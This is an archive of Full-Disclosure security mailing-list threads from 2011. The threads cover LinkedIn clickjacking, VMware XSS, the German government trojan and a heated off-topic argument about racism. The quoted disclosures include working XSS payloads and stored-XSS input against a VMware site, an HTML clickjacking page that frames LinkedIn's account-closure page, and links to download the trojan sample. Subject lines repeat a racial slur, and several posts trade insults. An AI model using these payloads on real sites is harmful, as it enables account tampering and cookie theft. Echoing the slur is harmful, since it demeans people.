> from racists, and, our past mistakes, have atleast been 'apologised' for,
> diplomatically, wich is mainly, what the natives here wanted, the
> aboriginals.
> Have a nice day to you also.
> xd
>
>
>
> On 7 October 2011 07:07, Benjamin Krueger wrote:
>
>> Racism in Australia is so notable, it has its own Wikipedia article.
>> Unfortunately the article does not touch on recent Australian racism,
>> particularly amongst government officials, against African refugees and
>> immigrants.
>>
>> http://en.wikipedia.org/wiki/Racism_in_Australia
>>
>> On Oct 6, 2011, at 12:56 PM, valdis.kletni...@vt.edu wrote:
>>
>> On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said:
>>
>> cheers.. just gotta b careful nowdays, specially if your in .au where,
>> there
>>
>> is basically no racism...
>>
>>
>> I suspect some of the aboriginals would take exception to that statement.

Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"

2011-10-06 Thread xD 0x41
As i said, take a look into the REAL world you fat arse =)
Obviously, some fatty who only has links, and news on tv, and, not even
listening to that properly, coz trying to watch his irc screen.
trawling...
anyhow, later. thx for proving, exactly what i said, and, welcome to
reality, there is no click-on-the-link here.



On 7 October 2011 07:55, Benjamin Krueger  wrote:

> http://www.nizkor.org/features/fallacies/personal-attack.html
>
> On Oct 6, 2011, at 1:52 PM, xD 0x41 wrote:
>
> whos trolling who ?
> screw you, and this stupid thread.
>
>
>
>
> On 7 October 2011 07:48, Benjamin Krueger wrote:
>
>> http://en.wikipedia.org/wiki/Straw_man
>>
>> On Oct 6, 2011, at 1:46 PM, xD 0x41 wrote:
>>
>> Yes ofcourse, we have gangs here roaming wild, attacking eachother because
>> of color... yep!
>> you sure know your stuff!
>>
>>
>> On 7 October 2011 07:07, Benjamin Krueger wrote:
>>
>>> Racism in Australia is so notable, it has its own Wikipedia article.
>>> Unfortunately the article does not touch on recent Australian racism,
>>> particularly amongst government officials, against African refugees and
>>> immigrants.
>>>
>>> http://en.wikipedia.org/wiki/Racism_in_Australia
>>>
>>> On Oct 6, 2011, at 12:56 PM, valdis.kletni...@vt.edu wrote:
>>>
>>> On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said:
>>>
>>> cheers.. just gotta b careful nowdays, specially if your in .au where,
>>> there
>>>
>>> is basically no racism...
>>>
>>>
>>> I suspect some of the aboriginals would take exception to that statement.

Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"

2011-10-06 Thread xD 0x41
hrm


On 7 October 2011 06:31, andrew.wallace wrote:

> On Thu, Oct 6, 2011 at 6:21 PM, Georgi Guninski 
> wrote:
> > risking n3td3v fate, sorry for offtopic.
> >
> > the nigger said [1] (no offense intended to black people):
> >
> > "American people understand that not everybody's been following the
> rules," he said. "These days, a lot of folks doing the right thing are not
> rewarded. A lot of folks who are not doing the right thing are rewarded."
> >
> > [1] http://www.cbsnews.com/8301-503544_162-20116707-503544.html
>
> This list is for national security advisors and analysts to do their work
> on the threats, we do not appreciate your racist slurs.
>
> The list is run by the British security industry in partnership with
> Secunia, please do not abuse the list twice.
>
> ---
>
> Andrew Wallace
>
> Independent consultant
>
> www.n3td3v.org.uk
>

Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"

2011-10-06 Thread xD 0x41
Hrm very good point there.
It is obviously monitored, but really, would the monitors, even get involved
in things... i don't know if that is just part of how to stay under, but
could be.
I do not know how mi5/6 works but, i have heard rumors, that he is some
form of undercover something... which is kinda cool with me. I would prefer to
know that, or even think that, than think he is a bad guy and, just being an
arse because he can be...
i would love some independent input from people who are working as
operatives, as Valdis said, it is good to see these people's input, especially
on some topics like ITsec and exploits/pocs and anything wonderful in this
area.
I know i am fine with that but, amazing to how many actual results point at
n3td3v as this... i certainly won't be using crazycoders.com/.us for any
posts for n3td3v, but certainly other people's blogs, are full of him/he ?
Anyhow.. enough for me, cappuccino time.
cheers,
xd


On 7 October 2011 08:59,  wrote:

> On Thu, 06 Oct 2011 14:25:18 PDT, "andrew.wallace" said:
>
> > MI6 operative - I didn't know you delt in conspiracy. My web page clearly
> > states "independent".
>
> Which is exactly what it *would* say if you were an undercover operative.
>
> http://www.google.com/search?q=n3td3v+mi5
> http://www.google.com/search?q=n3td3v+mi6
> http://www.google.com/search?q="andrew+wallace"+mi5
> http://www.google.com/search?q="andrew+wallace"+mi6
>
> Certainly a lot of history there.
>
> In any case, whether or not you're an MI6 operative, if the list *is* for
> national security advisors, isn't it silly for you to try to shut it down
> because
> of your anti-disclosure stance?
>

Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking

2011-10-07 Thread xD 0x41
Screw you dude, attaching executable doc files, and then pushing out a few
*0days*
I won't be looking at *any* thing attached as a doc, that's just common sense.
nowadays, and there is abs NO need on this list for it, it is FD, you're meant
to put it in the BODY of email, or at least maybe next time, change the type
to linux 0day and attach .S file... ??
screw u and ur advisories, fix them into proper order as in written as any
would be, and i'll read it, but never ask a dood to open the attachment!




On 7 October 2011 22:48, asish agarwalla  wrote:

> Hi,
>
> LinkedIn_User Account Delete using Click jacking.
>
> This Vulnerability is accepted by LinkedIn they are in a process
> to patched it but not yet patched.
>
> Please find the document describing the vulnerability.
>
> Regards
> Asish
>

Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"

2011-10-07 Thread xD 0x41
How about we all agree that the word itself, should not be used ever, it is
not a very nice thing to call people, i mean, you don't see chinese people
calling each other yellies... skin color should have no place on the list,
so how about just, forgive and forget it is a bit easier, or, rather just
keep opinions to a consensus which most of the list can agree upon , then you
can speak to George however you like... I am just saying, it is enough about
racism.. there is no place, and no talking it, it just plain sucks when it
is done, we all know this, we all dislike when people would pick on things
sometimes not in our control.
I forgive George for his wording, i hope many others can also.
cheers


On 8 October 2011 01:29,  wrote:

> On Fri, 07 Oct 2011 09:29:22 +0300, Georgi Guninski said:
>
> > i am by no way a racist.
> > the OP specifically wrote "no offence intended".
> > being a non-native speaker if someone is offended about skin colour it is
> a language mistake of mine.
>
> Ya know, Georgi, you can't have it both ways. I realize that that you're
> not a native speaker, and possibly not up to speed on all the ins and outs
> of cultural and race relations over here.  So I would actually have been
> willing to give you the benefit of the doubt, that it was an honest mistake
> and
> you really didn't know that it had different meanings than if you had said
> "The
> black dude in charge".
>
> But then you go and stick "no offence intended" on it, which means that (a)
> you
> *did* understand the difference, and (b) you *didn't* go back and change it
> to
> "the black dude in charge" or something before you hit Send. And at that
> point,
> you forfeit any right to claim that it was a language mistake.
>
>

Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"

2011-10-07 Thread xD 0x41
On the whole security topic... apparently *some* VPNs claim to be
indestructible...

Which VPN Providers Really Take Anonymity Seriously?
http://feed.torrentfreak.com/~r/Torrentfreak/~3/9l5B4f6Fkbw/

Thru rss feed... interesting read.

Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking

2011-10-07 Thread xD 0x41
Hi,
Another security expert... sheesh... and they cannot do simplest of tasks,
makes me wonder really how do they get anything at all coded, but then again
i doubt there is code... I bet they're all some persistent xss etc... which
would req some fuzz tool... well, certainly see better people like kcope
who does not call himself any senior security, yet has made many of remote
exploits, and he posts them in his  so, it should be i think put in
the email body, responsibly that is.
That would be good to have but since every company takes ITsec so
differently, i know MS and Google have great disclosure policies, but this
is supposed to be on their end, not ours... so i guess its another good
question.
cheers
xd



On 8 October 2011 06:25, Peter Dawson  wrote:

> if I get it right this dude is supposed to be "
>
>- Senior Security Analyst at iViZ Techno Solutions Pvt. 
> Ltd.<http://www.linkedin.com/company/iviz-techno-solutions-pvt.-ltd.?trk=ppro_cprof>
>
> Whatever happened  on protocol's for  responsible disclosure ?
>
> On Fri, Oct 7, 2011 at 3:05 PM, xD 0x41  wrote:
>
>> Screw you dude, attaching executable doc files , and then pushing out a
>> few *0days*
>> I wont be looking at *any* thing attached as a doc, thats just common
>> sense. nowdays, and there is abs NO need on this list for it, it is FD, your
>> meant to put it in the BODY of email, or atleast maybe next time, change the
>> type to linux 0day and attach .S file... ??
>> screw u and ur advisorys, fix them into proper order asin written as any
>> would be, and ill read it, but never ask a dood to open the attachment!
>>
>>
>>
>>
>>   On 7 October 2011 22:48, asish agarwalla wrote:
>>
>>>  Hi,
>>>
>>> LinkedIn_User Account Delete using Click jacking.
>>>
>>> This Vulnerability is accepted by LinkedIn they are in a process
>>> to patched it but not yet patched.
>>>
>>> Please find the document describing the vulnerability.
>>>
>>> Regards
>>> Asish
>>>

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread xD 0x41
Interesting thread... issues of privacy are again raping the tech world..
please assist in exposing comcast if this is indeed true.
Either someone has been playing admin and put up some kind of fake login
page although that's highly unlikely, proof of the actual deployment of an exe
by the isp is a huge issue.
I know some isp's make use of port 80, and remote-assist, but they do not
rely on it, not in a usual Isp that is for sure.
Comcast is huge, i'd be looking into it more and gathering REAL HARD proof of
this, whether it was a tech acting alone or in fact some kind of page they have
forwarded you to to "assist" possibly.. if you can recall any recent
interactions with comcast, and what took place, this would also help.
You want exactly what page was downloaded FROM  and then ask them about it
(beforehand though make sure to also check their TOS regarding their usage
of anything - i doubt this would be visible so you may be onto a winner), it
would be great to see it even this exe and allow the list to debug it.
That would then probably give you plenty of info about the executable IF it
was installed by a comcast tech, you could then sue for that and any
*damages* or, just having a slower line/instability/dropouts/downage etc
etc i would definitely be looking into it before assuming it is comcasts
exe 100%.
It is a massive breach of privacy if this is how they are acting, unless it
is standard practice for some cases where they may assist remotely, and then
would probably need some diagnostic executables, but really this should not
be hard to find.. I would get your logs out and even take a peek into tmp of
your downloads for IE/FF or whatever your browser, and try to trace it to
when it was implanted.
Good luck, cheers!
xd


On 8 October 2011 01:47, Terrence  wrote:

> To the guy saying that comcast  requires an executable to authenticate you.
> Ha. You should prolly wipe your install.
> On Oct 7, 2011 10:41 AM,  wrote:
>
>> On Fri, 07 Oct 2011 10:36:39 EDT, James Wright said:
>>
>> > That would probably explain why the Comcast service page downloads an
>> > executable to authenticate you.  At that point they have control over
>> the
>> > end user's machine and can either clear the DNS cache or force a reboot.
>>
>> That must suck if you're a non-Windows user. ;)
>>

Re: [Full-disclosure] Vmware Web-Site Persistence and Non-Persistence Cross-Site Scripting

2011-10-08 Thread xD 0x41
nice find.
Please, put your FULL PoC within the email BODY when you are sending out
disclosures.. It would make some of us certainly feel a bit better about
reading them... specially when gmail refuses or has problems scanning, that
should not happen, it should pass straight through... do your own testing,
send from anywhere to gmail/googlemail and watch what the AV scanner says
(and believe me they have a very cool scanner)...


On 8 October 2011 16:42, asish agarwalla  wrote:

> *Non-**Persistence/**Reflected Cross-Site Scripting*
>
>
> http://alliances.vmware.com/public_html/catalog/searchResult.php?isServicesProduct=no&isEntireCatalogSearch=yes&lastOnMenu=sub1,sub4&searchKey=
> "/>alert(document.cookie)&category=all&isVmwareReadySelected=no
>
>
> *Persistence Cross-Site Scripting*
>
> Create a account in VMWARE. Insert First Name as : test
> "/>>alert(document.cookie)., Inserted script stored as
> first name.
>
> Login to vmware, Select Login to as Manage Orders, Inserted script get
> executed.
>
>
>
>
>
>

Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking

2011-10-08 Thread xD 0x41
That's just lame dude if you could remove OTHER people's accounts, then i'd
say *clap clap*... but own account... what about just clicking "close
account" , and let's skip creating a html page, for this... :) cheers


On 8 October 2011 17:06, asish agarwalla  wrote:

> Be logged into Linkedin, in firefox
> Create a HTML page using the below code
> Open the created HTML page in a new firefox tab
> Play the simple game
>
>
> 
> 
> 
> button.dummy1{position:absolute;top:75px;left:177px;z-index:-10}
> button.dummy3{position:absolute;top:214px;left:177px;z-index:-10}
> #Div3{
> opacity: 0;
> position: absolute;
> top: 25px;
> left: 160px;
>
> }
> #Div2{
> opacity: 1;
> position: absolute;
> top: 65px;
> left: 340px;
>
> }
> #Div1 {
> opacity: 1;
> position: absolute;
> top: 65px;
> left: 195px;
>
> }
> #victim2 {
> opacity: 1;
> position: absolute;
> top: 65px;
> left: 50px;
>
> }
> #victim {
> opacity: 0.4;
> position: absolute;
> top: -226px;
> left: -35px;
>
> width:800px;
> height: 800px;
> }
> 
> 
> 
> 
> Please Click Twice on the Right Options And Then Click Submit
> 
> 
> 55+27=?
> 
> 
> 55 
> 
> 
> 82
> 
> 
> 95
> 
>
> Submit
> 
> https://www.linkedin.com/secure/settings?closemyaccountstart=&goback=.nas_*1_*1_*1";
> border=0 scrolling=no width=650 height=1100>
> 
> 
> 
>
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
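
The PoC quoted in the message above only works if the account-closure page can be rendered inside a frame on a third-party origin. As an added example (not code from the thread or from LinkedIn), this JavaScript models how a browser decides from `X-Frame-Options` and CSP `frame-ancestors` whether a cross-origin parent may frame a response; the function names and sample URLs are constructed, and it assumes a single parent frame.

```javascript
// Added example, not code from the thread. Simplified model: one parent
// frame, and CSP sources that carry a path are treated as non-matching.

function headerValues(headers, name) {
  // Header names are case-insensitive and a header may be repeated.
  const out = [];
  for (const [key, value] of Object.entries(headers)) {
    if (key.toLowerCase() === name) out.push(...[].concat(value));
  }
  // A comma-joined value carries several policies (CSP) or values (XFO).
  return out.flatMap((v) => v.split(',')).map((v) => v.trim());
}

function frameAncestors(policy) {
  // Source list of the frame-ancestors directive, or null when absent.
  for (const directive of policy.split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources;
  }
  return null;
}

function schemeOk(expected, actual) {
  // CSP lets an http source also match the https upgrade of the same host.
  return actual === expected || (expected === 'http:' && actual === 'https:');
}

function effectivePort(url) {
  return url.port || { 'http:': '80', 'https:': '443' }[url.protocol] || '';
}

function sourceMatches(source, parent, self) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return parent.origin === self.origin;
  if (s === '*') return ['http:', 'https:'].includes(parent.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return schemeOk(s, parent.protocol);
  // host-source: [scheme://]host[:port], where host may start with "*."
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (!schemeOk(scheme ? scheme + ':' : self.protocol, parent.protocol)) return false;
  const hostOk = wildcard
    ? parent.hostname.endsWith('.' + host) // "*.a.example" excludes "a.example"
    : parent.hostname === host;
  const portOk = port === undefined
    ? parent.port === '' // no port in the source: default port only
    : port === '*' || port === effectivePort(parent);
  return hostOk && portOk;
}

function mayBeFramedBy(headers, pageUrl, parentUrl) {
  const self = new URL(pageUrl);
  const parent = new URL(parentUrl);
  const lists = headerValues(headers, 'content-security-policy')
    .map(frameAncestors)
    .filter((list) => list !== null);
  if (lists.length > 0) {
    // Every policy with frame-ancestors must allow the parent. When the
    // directive is present, X-Frame-Options is ignored, even if stricter.
    const allowed = lists.every((list) =>
      list.some((src) => sourceMatches(src, parent, self)));
    return { allowed, decidedBy: 'frame-ancestors' };
  }
  const xfo = headerValues(headers, 'x-frame-options').map((v) => v.toUpperCase());
  if (xfo.includes('DENY')) return { allowed: false, decidedBy: 'x-frame-options' };
  if (xfo.includes('SAMEORIGIN')) {
    return { allowed: parent.origin === self.origin, decidedBy: 'x-frame-options' };
  }
  // ALLOW-FROM is obsolete and not enforced by current browsers.
  return { allowed: true, decidedBy: 'none' };
}
```

A response with neither header, or with only `ALLOW-FROM`, is reported as frameable, which is the condition the PoC depends on.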

Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking

2011-10-09 Thread xD 0x41
> it seems that you aren't familiar what Clickjacking means then...

No,... and am happy not to know :-) , like XSS , i do not waste time with
minority bugs such as 'clickjacking' and these new such terms which are
total BS.
anyhow... call it what you like, it is bs (just like the win32 dll crap and
simple-xss) CRAP!)
xd



On 10 October 2011 04:53, Ferenc Kovacs  wrote:

> it seems that you aren't familiar what Clickjacking means then...
>
> On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41  wrote:
> > Thats just lame dude if you could remove OTHER poples accounts, then
> id
> > say 8clap clap*... but own account... whjat about just clicking "close
> > account" , and lets skip creating a html page, for this... :) cheers
> >
> >
> > On 8 October 2011 17:06, asish agarwalla 
> wrote:
> >>
> >> Be logged into Linkedin, in firefox
> >> Create a HTML page using the below code
> >> Open the created HTML page in a new firefox tab
> >> Play the simple game
> >>
> >> 
> >> 
> >> 
> >> button.dummy1{position:absolute;top:75px;left:177px;z-index:-10}
> >> button.dummy3{position:absolute;top:214px;left:177px;z-index:-10}
> >> #Div3{
> >> opacity: 0;
> >> position: absolute;
> >> top: 25px;
> >> left: 160px;
> >> }
> >> #Div2{
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 340px;
> >> }
> >> #Div1 {
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 195px;
> >> }
> >> #victim2 {
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 50px;
> >> }
> >> #victim {
> >> opacity: 0.4;
> >> position: absolute;
> >> top: -226px;
> >> left: -35px;
> >> width:800px;
> >> height: 800px;
> >> }
> >> 
> >> 
> >> 
> >> 
> >> Please Click Twice on the Right Options And Then Click Submit
> >> 
> >> 
> >> 55+27=?
> >> 
> >> 
> >> 55 
> >> 
> >> 
> >> 82
> >> 
> >> 
> >> 95
> >> 
> >> Submit
> >> 
> >>  >> src="
> https://www.linkedin.com/secure/settings?closemyaccountstart=&goback=.nas_*1_*1_*1
> "
> >> border=0 scrolling=no width=650 height=1100>
> >> 
> >> 
> >> 
> >>
> >>
> >>
>
>
>
> --
> Ferenc Kovács
> @Tyr43l - http://tyrael.hu
>

Re: [Full-disclosure] Possible German Governmental Backdoor found ("R2D2")

2011-10-09 Thread xD 0x41
Interesting... although that archive seems corrupt... i'd like to see a bit
more about this but, very interesting indeed.. specially skype id
harvesting, what could this be for.
hrms
xd


On 10 October 2011 07:13,  wrote:

>  On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned
>   wrote:
> > Hi List,
> >
> > i thougt this could be interesting. My english is not very good so i
> > copied the following information from FSecure
> > (http://www.f-secure.com/weblog/archives/2249.html [1])
> >
> > "Chaos Computer Club from Germany has tonight announced that they
> > have located a backdoor trojan used by the German Goverment.
> >
> > The announcment was made public on ccc.de [2] with a detailed 20-page
> > analysis of the functionality of the malware. Download the report in
> > PDF [3] (in German)
> >
> > The malware in question is a Windows backdoor consisting of a DLL and
> > a kernel driver.
> >
> > The backdoor includes a keylogger that targets certain applications.
> > These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and
> > others.
> >
> > The backdoor also contains code intended to take screenshots and
> > record audio, including recording Skype calls.
> >
> > In addition, the backdoor can be remotely updated. Servers that it
> > connects to include 83.236.140.90 [4] and 207.158.22.134"
> >
> > According to CCC Germany the backdoor could also be exploited by
> > third parties. You can download it from
> > http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
> > [5]  . You'll need gzip and tar to get the .dll and the .sys file.
> >
> >
> > Links:
> > --
> > [1] http://www.f-secure.com/weblog/archives/2249.html
> > [2] http://www.ccc.de/
> > [3]
> >
> > http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf
> > [4] http://webmail.0m3ga.net/tel:83.236.140.90
> > [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
>
>  I was looking at this just late last night.
>

Re: [Full-disclosure] Possible German Governmental Backdoor found ("R2D2")

2011-10-09 Thread xD 0x41
Ta , i'll take a look.. very interesting, i'd love to see src code ;p
That would be in whose hands,... i wonder..hehe.. maybe gov or just very
very smart hax0r...


On 10 October 2011 10:21, You Got Pwned  wrote:

> gunzip the archive then use tar. I also made a zip file which contains the
> extracted .dll and the .sys file and uploaded it 
> here<http://www.2shared.com/file/QWyk-yCp/bundestrojaner.html>
> .
>
>
> 2011/10/10 xD 0x41 
>
>> Interesting... although that archive seems corrupt... id like to see abit
>> more about this but, very interesting indeed.. specially skype id
>> harvesting, what could this be for.
>> hrms
>> xd
>>
>>
>>  On 10 October 2011 07:13,  wrote:
>>
>>>   On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned
>>>   wrote:
>>> > Hi List,
>>> >
>>> > i thougt this could be interesting. My english is not very good so i
>>> > copied the following information from FSecure
>>> > (http://www.f-secure.com/weblog/archives/2249.html [1])
>>> >
>>> > "Chaos Computer Club from Germany has tonight announced that they
>>> > have located a backdoor trojan used by the German Goverment.
>>> >
>>> > The announcment was made public on ccc.de [2] with a detailed 20-page
>>> > analysis of the functionality of the malware. Download the report in
>>> > PDF [3] (in German)
>>> >
>>> > The malware in question is a Windows backdoor consisting of a DLL and
>>> > a kernel driver.
>>> >
>>> > The backdoor includes a keylogger that targets certain applications.
>>> > These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and
>>> > others.
>>> >
>>> > The backdoor also contains code intended to take screenshots and
>>> > record audio, including recording Skype calls.
>>> >
>>> > In addition, the backdoor can be remotely updated. Servers that it
>>> > connects to include 83.236.140.90 [4] and 207.158.22.134"
>>> >
>>> > According to CCC Germany the backdoor could also be exploited by
>>> > third parties. You can download it from
>>> > http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
>>> > [5]  . You'll need gzip and tar to get the .dll and the .sys file.
>>> >
>>> >
>>> > Links:
>>> > --
>>> > [1] http://www.f-secure.com/weblog/archives/2249.html
>>> > [2] http://www.ccc.de/
>>> > [3] http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf
>>> > [4] http://webmail.0m3ga.net/tel:83.236.140.90
>>> > [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
>>>
>>>  I was looking at this just late last night.
>>>

Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking

2011-10-09 Thread xD 0x41
No, i have been through these, and only an idiot would fall for any of these
attacks... Persistent XSS maybe harder, but, forget the rest :)
I'm too old for that.
Never been a victim yet, in *any* way, and, certainly, those bugs won't be
starting a trend..
cheer.
xd


On 10 October 2011 10:27,  wrote:

> On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said:
>
> > No,... and am happy not to know :-) , like XSS , i do not waste time with
> > minority bugs such as 'clickjacking' and these new such terms which are
> > total BS.
>
> It's all total BS till you discover you're a victim of the attack.
>

Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking

2011-10-09 Thread xD 0x41
YEP!
When ya do it right, dang right it is!

I did never reproduce the EXACT method which made the x41's happen... but, i
dun really care for that bug, or you call it a feature..well, i don't know
features which have x41's all over the emails when made in a special way...
so, it was low-level too :)
anyhow, no, i won't bother to recreate the email body, without using any
'features' of Google's, for you.
It is possible to exploit rich text editor, i have said.. the dll itself..
so maybe go investigate and stfu :)
now back to the backdoor.




On 10 October 2011 11:23, adam  wrote:

> Yeah guys, XSS is nonsense. Exploiting anchor text is where it's at, right
> secn3t?
>
> http://seclists.org/fulldisclosure/2011/Jun/215
>
> On Sun, Oct 9, 2011 at 7:10 PM, xD 0x41  wrote:
>
>> No, i have been through these, and only an idiot would fall for any of
>> these attacks... Persistent XSS maybe harder, but, forget the rest :)
>> I'm too old for that.
>> Never been a victim yet, in *any* way, and, certainly, those bugs won't be
>> starting a trend..
>> cheer.
>> xd
>>
>>
>>
>> On 10 October 2011 10:27,  wrote:
>>
>>> On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said:
>>>
>>> > No,... and am happy not to know :-) , like XSS , i do not waste time with
>>> > minority bugs such as 'clickjacking' and these new such terms which are
>>> > total BS.
>>>
>>> It's all total BS till you discover you're a victim of the attack.
>>>

Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking

2011-10-09 Thread xD 0x41
Hello Michele,
I will take a look, because honestly, I don't see anything good about NON
persistent xss, so i will have a look and see, thanks :)
cheers
xd

On 10 October 2011 17:24, Michele Orru  wrote:

> If you all think XSS, even reflected or DOM-based sucks..probably you don't
> know the BeEF project.
> I would suggest you to take a look at http://beefproject.com , try it, and
> see yourself what you can do :-)
> Cheers
> antisnatchor
> On 10 Oct 2011 02:56, "xD 0x41"  wrote:
>
>> YEP!
>> When ya do it right, dang right it is!
>>
>> I did never reproduce the EXACT method which made the x41's happen... but, i
>> dun really care for that bug, or you call it a feature..well, i don't know
>> features which have x41's all over the emails when made in a special way...
>> so, it was low-level too :)
>> anyhow, no, i won't bother to recreate the email body, without using any
>> 'features' of Google's, for you.
>> It is possible to exploit rich text editor, i have said.. the dll itself..
>> so maybe go investigate and stfu :)
>> now back to the backdoor.
>>
>>
>>
>>
>> On 10 October 2011 11:23, adam  wrote:
>>
>>> Yeah guys, XSS is nonsense. Exploiting anchor text is where it's at,
>>> right secn3t?
>>>
>>> http://seclists.org/fulldisclosure/2011/Jun/215
>>>
>>> On Sun, Oct 9, 2011 at 7:10 PM, xD 0x41  wrote:
>>>
>>>> No, i have been through these, and only an idiot would fall for any of
>>>> these attacks... Persistent XSS maybe harder, but, forget the rest :)
>>>> I'm too old for that.
>>>> Never been a victim yet, in *any* way, and, certainly, those bugs won't
>>>> be starting a trend..
>>>> cheer.
>>>> xd
>>>>
>>>>
>>>>
>>>> On 10 October 2011 10:27,  wrote:
>>>>
>>>>> On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said:
>>>>>
>>>>> > No,... and am happy not to know :-) , like XSS , i do not waste time with
>>>>> > minority bugs such as 'clickjacking' and these new such terms which are
>>>>> > total BS.
>>>>>
>>>>> It's all total BS till you discover you're a victim of the attack.
>>>>>

Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”

2011-10-10 Thread xD 0x41
Depending on the type of cage/shielding (don't know about the local one) it
can completely block communications...

As i know, ISPs are now blocking the infected subnets, and thus cutting off
even scanning from being possible... but, it only takes a new bug to bypass
this, and in windows and linux this is always happening..


On 11 October 2011 07:24, Christian Sciberras  wrote:

> Well, I know a local datacenter (can't be more than 10 years old) makes use
> of a Faraday cage around it.
> And it doesn't really keep any mission-critical equipment, so I guess
> others out there do the same.
>
> Depending on the type of cage/shielding (don't know about the local one) it
> can completely block communications...
>
>
>
>
>
>
> On Mon, Oct 10, 2011 at 10:17 PM, Michael Schmidt 
> wrote:
>
>>  I have no idea, I assume – this is usually what they mean when they talk
>> about an “air barrier”
>>
>> *From:* evejou [mailto:g...@techn0ev3.net]
>> *Sent:* Monday, October 10, 2011 1:04 PM
>> *To:* Michael Schmidt
>> *Cc:* Thor (Hammer of God); Christian Sciberras; Michael T;
>> full-disclosure@lists.grok.org.uk
>>
>> *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps
>> coming back”
>>
>> As someone kind of young (and thus no historical recollection), I'm kind
>> of surprised that this is talked about in past-tense. Does this not happen
>> anymore? I could see how this could get super annoying after awhile.
>>
>> On Mon, Oct 10, 2011 at 2:09 PM, Michael Schmidt 
>> wrote:
>>
>> I know in the old days (15 years ago) – there were networks that were
>> completely separate from the outside world. I remember trying to do
>> telephone tech support to someone on a secure network…
>>
>>  
>>
>> Tell him to do “this”
>>
>> He puts down the phone, goes through physical security, tries “this”
>>
>> He comes back through security, picks up phone, talks to me.
>>
>>  
>>
>> Security allowed nothing that looked like portable storage in or out of
>> the secure area.
>>
>>  
>>
>> Rinse.
>>
>> Repeat.
>>
>>  
>>
>> Couldn’t even place outside voice calls from the secure network area. I
>> don’t know if they do this today. I also know that there used to be setups
>> with removable hard drives where one drive connected you to the secure
>> network and yet another drive connected to the unsecure network. – Two
>> different network cards each enabled for different networks.
>>
>>  
>>
>> The good old days
>>
>>  
>>
>> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
>> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Thor (Hammer of
>> God)
>> *Sent:* Monday, October 10, 2011 10:36 AM
>> *To:* Christian Sciberras; Michael T
>>
>>
>> *Cc:* full-disclosure@lists.grok.org.uk
>> *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps
>> coming back”
>>
>>  
>>
>> Consider the source.  It’s “someone close” to the operations, and that
>> only according to this guy.  It could very well be a slot-puller in the
>> casino across the street…   I’m always dubious of the reporting of this type
>> of thing where the source is some “secret” person, and where there is never
>> any ability to refute claims.
>>
>>  
>>
>> t
>>
>>  
>>
>> *From:* full-disclosure-boun...@lists.grok.org.uk
>> [mailto:full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Christian
>> Sciberras
>> *Sent:* Monday, October 10, 2011 7:05 AM
>> *To:* Michael T
>> *Cc:* full-disclosure@lists.grok.org.uk
>> *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps
>> coming back”
>>
>>  
>>
>> I'm talking more about their engineers than their network.
>>
>>  
>>
>> If I had my network infected with a virus, I'd immediately deploy some
>> form of logging/monitoring tool (eg, wireshark).
>>
>>  
>>
>> Honestly, it all sounds like they're employing inexperienced engineers.
>> Which is again strange, considering the field they're in.
>>
>>  
>>
>> Regarding your bet, see that's already something. Why exactly can't they
>> verify your bet? It isn't like viruses suddenly became invisible, is it?
>>
>>  
>>
>> I'm just curious to these questions. It's strange to hear someone saying
>> "we basically have no idea what's going on".
>>
>>  
>>
>>  
>>
>> On Mon, Oct 10, 2011 at 3:40 PM, Michael T  wrote:
>>
>> It's a network that's 'detached', or 'segregated', or whatevered from the
>> rest of the world, so it's 'largely immune to viruses'.  That likely means
>> they have:
>> 1. NO logging
>> 2. NO anti-virus
>> 3. NO hardening
>>
>> The very fact that these systems are on a segregated network means they
>> are probably more frail, and more susceptible to viruses, than a normal
>> person's laptop.
>>
>> Immune to viruses...  What a crock of shit.  My bet is that it's coming
>> from the planes.
>>
>> Mike
>>
>> On Mo
